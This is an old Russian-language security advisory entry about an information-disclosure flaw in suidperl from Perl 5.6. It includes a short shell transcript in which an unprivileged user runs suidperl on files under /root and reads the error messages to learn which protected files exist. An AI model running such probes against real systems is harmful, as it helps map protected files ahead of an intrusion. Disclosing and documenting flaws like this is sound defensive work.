Ракрытие информации в SuidPerl
| Дата публикации: | 04.12.2002 |
| Всего просмотров: | 1129 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Suidperl - perl интерпретатор для suid perl сценариев, часть пакета perl. Уязвимость, обнаруженная в SuidPerl, позволяет атакующему проверить существование файла в недоступной директории. Нападающий может эксплуатировать эту уязвимость, вызывая suidperl с абсолютным именем файла, чтобы определить, существует ли файл. В этом случае suidperl выдаст сообщение, которое подтверждает существование файла. Пример: bash-2.04$ ls -ald /root drwxr-x--- 66 root root 8192 Nov 29 16:00 /root bash-2.04$ id uid=500(evil) gid=500(evil) groups=500(evil) bash-2.04$ ls /root/.bashrc ls: /root/.bashrc: Permission denied bash-2.04$ suidperl /root/.bashrc Script is not setuid/setgid in suidperl bash-2.04$ suidperl /root/nonexistantfile Can't open perl script "/root/nonexistantfile": No such file or directoryуязвимость обнаружена в Larry Wall Perl 5.6 |